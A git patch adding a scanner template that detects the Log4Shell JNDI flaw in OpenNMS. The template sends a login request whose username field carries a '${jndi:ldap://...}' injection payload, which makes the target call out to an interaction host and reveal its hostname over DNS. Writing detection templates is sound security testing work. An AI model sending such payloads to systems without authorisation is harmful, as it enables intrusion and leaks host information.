From 35d13abbb07a82a821bb4a04212b9da9c81fdd80 Mon Sep 17 00:00:00 2001
From: johnk3r <johnatan2camargo@gmail.com>
Date: Thu, 14 Jul 2022 10:31:10 -0300
Subject: [PATCH] Create opennms-log4j-jndi-rce.yaml

---
 .../other/opennms-log4j-jndi-rce.yaml         | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 vulnerabilities/other/opennms-log4j-jndi-rce.yaml

diff --git a/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
new file mode 100644
index 0000000000..818a03f7f1
--- /dev/null
+++ b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
@@ -0,0 +1,42 @@
+id: opennms-log4j-jndi-rce
+
+info:
+  name: OpenNMS Log4J JNDI RCE
+  author: johnk3r
+  severity: high
+  description: OpenNMS Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker
+    who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  reference:
+    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
+    - https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/
+  classification:
+    cve-id: CVE-2021-44228
+  tags: jndi,log4j,rce,cve,cve2021,opennms
+
+requests:
+  - raw:
+      - |
+        POST /opennms/j_spring_security_check HTTP/1.1
+        Referer: {{RootURL}}/opennms/login.jsp
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output